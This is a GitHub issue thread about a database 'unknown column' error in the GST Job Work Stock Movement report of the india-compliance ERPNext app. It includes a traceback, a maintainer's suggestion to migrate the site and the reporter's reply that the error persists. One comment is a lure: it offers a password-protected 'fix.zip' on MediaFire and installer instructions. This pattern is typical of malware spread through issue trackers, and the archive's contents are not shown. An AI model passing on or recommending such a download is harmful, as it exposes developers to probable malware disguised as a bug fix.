### ISSUE TITLE
GST Job Work Stock Movement Report Error

### ISSUE THREAD

**Issue by RJMHASKE** [resilient-tech/india-compliance#2578]
### Information about bug

Hi,

We are facing below issue while opening GST Job Work Stock Movement Report

<img width="758" src="https://github.com/user-attachments/assets/d0d92eb0-36de-4bfd-9bcf-c4c3c46f0b13" alt="image">

### Version

erpnext: 15.33.5
frappe: 15.39.1
india_compliance: 15.13.1

### Relevant log output / Stack trace / Full Error Message.

```shell
### App Versions

{
	"ecommerce_integrations": "1.20.1",
	"education": "15.0.0",
	"erpnext": "15.33.5",
	"frappe": "15.39.1",
	"frappe_whatsapp": "v1.0.7",
	"healthcare": "16.0.0-dev",
	"hrms": "15.27.0",
	"india_compliance": "15.13.1",
	"insights": "2.2.4",
	"payments": "0.0.1",
	"print_designer": "1.4.1"
}
```

### Route

```
query-report/GST Job Work Stock Movement
```

### Traceback

```
Traceback (most recent call last):
  File "apps/frappe/frappe/app.py", line 114, in application
    response = frappe.api.handle(request)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "apps/frappe/frappe/api/__init__.py", line 49, in handle
    data = endpoint(**arguments)
           ^^^^^^^^^^^^^^^^^^^^^
  File "apps/frappe/frappe/api/v1.py", line 36, in handle_rpc_call
    return frappe.handler.handle()
           ^^^^^^^^^^^^^^^^^^^^^^^
  File "apps/frappe/frappe/handler.py", line 49, in handle
    data = execute_cmd(cmd)
           ^^^^^^^^^^^^^^^^
  File "apps/frappe/frappe/handler.py", line 85, in execute_cmd
    return frappe.call(method, **frappe.form_dict)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "apps/frappe/frappe/__init__.py", line 1768, in call
    return fn(*args, **newargs)
           ^^^^^^^^^^^^^^^^^^^^
  File "apps/frappe/frappe/utils/typing_validations.py", line 31, in wrapper
    return func(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^
  File "apps/frappe/frappe/__init__.py", line 921, in wrapper_fn
    retval = fn(*args, **get_newargs(fn, kwargs))
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "apps/frappe/frappe/desk/query_report.py", line 223, in run
    result = generate_report_result(report, filters, user, custom_columns, is_tree, parent_field)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "apps/frappe/frappe/__init__.py", line 921, in wrapper_fn
    retval = fn(*args, **get_newargs(fn, kwargs))
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "apps/frappe/frappe/desk/query_report.py", line 84, in generate_report_result
    res = get_report_result(report, filters) or []
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "apps/frappe/frappe/desk/query_report.py", line 65, in get_report_result
    res = report.execute_script_report(filters)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "apps/frappe/frappe/core/doctype/report/report.py", line 162, in execute_script_report
    res = self.execute_module(filters)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "apps/frappe/frappe/core/doctype/report/report.py", line 179, in execute_module
    return frappe.get_attr(method_name)(frappe._dict(filters))
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "apps/india_compliance/india_compliance/gst_india/report/gst_job_work_stock_movement/gst_job_work_stock_movement.py", line 12, in execute
    return report.columns(), report.data()
                             ^^^^^^^^^^^^^
  File "apps/india_compliance/india_compliance/gst_india/report/gst_job_work_stock_movement/gst_job_work_stock_movement.py", line 41, in data
    data = itc04.get_query_table_4_se().run(as_dict=True)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "apps/frappe/frappe/query_builder/utils.py", line 87, in execute_query
    result = frappe.db.sql(query, params, *args, **kwargs)  # nosemgrep
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "apps/frappe/frappe/database/database.py", line 234, in sql
    self._cursor.execute(query, values)
  File "env/lib/python3.11/site-packages/pymysql/cursors.py", line 153, in execute
    result = self._query(query)
             ^^^^^^^^^^^^^^^^^^
  File "env/lib/python3.11/site-packages/pymysql/cursors.py", line 322, in _query
    conn.query(q)
  File "env/lib/python3.11/site-packages/pymysql/connections.py", line 563, in query
    self._affected_rows = self._read_query_result(unbuffered=unbuffered)
                          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "env/lib/python3.11/site-packages/pymysql/connections.py", line 825, in _read_query_result
    result.read()
  File "env/lib/python3.11/site-packages/pymysql/connections.py", line 1199, in read
    first_packet = self.connection._read_packet()
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "env/lib/python3.11/site-packages/pymysql/connections.py", line 775, in _read_packet
    packet.raise_for_error()
  File "env/lib/python3.11/site-packages/pymysql/protocol.py", line 219, in raise_for_error
    err.raise_mysql_exception(self._data)
  File "env/lib/python3.11/site-packages/pymysql/err.py", line 150, in raise_mysql_exception
    raise errorclass(errno, errval)
pymysql.err.OperationalError: (1054, "Unknown column 'tabStock Entry.gst_category' in 'field list'")
```

### Request Data

```
{
	"type": "GET",
	"args": {
		"report_name": "GST Job Work Stock Movement",
		"filters": "{\"company\":\"Mannlowe Information Services Pvt. Ltd.\",\"from_date\":\"2023-10-01\",\"to_date\":\"2024-03-31\",\"category\":\"Sent for Job Work (Table 4)\"}",
		"ignore_prepared_report": false,
		"are_default_filters": false
	},
	"headers": {},
	"error_handlers": {},
	"url": "/api/method/frappe.desk.query_report.run",
	"request_id": "9e17b2ea-083a-4a19-ae1c-3f66a10e4d31"
}
```

### Response Data

```
{
	"exception": "pymysql.err.OperationalError: (1054, \"Unknown column 'tabStock Entry.gst_category' in 'field list'\")",
	"exc_type": "OperationalError",
	"_exc_source": "india_compliance (app)"
}
```

```


### Code of Conduct

- [X] I agree to follow this project's Code of Conduct
```

<sub><a href="https://huly.app/guest/resilienttech?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsaW5rSWQiOiI2NmNlYWFjNWQyZTVkN2NmZmI4NzliZmUiLCJndWVzdCI6InRydWUiLCJlbWFpbCI6IiNndWVzdEBoYy5lbmdpbmVlcmluZyIsIndvcmtzcGFjZSI6Inctc21pdHZvcmEyMDMtcmVzaWxpZW50dGVjLTY2N2U0MjkxLWEwNWMwNjY4N2EtNjM4MjY3In0.oL0GNR6QrFbZBWfCBSVww7xRyysi1h6DhSuHtL7-8y0">Huly&reg;: <b>IC-2696</b></a></sub>

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by vorasmit** [comment]
I guess fields are not created. Can you check if the issue persists after migrating the site?

**Comment by dineshpanchal93** [comment]
Yes still we face the same issue.
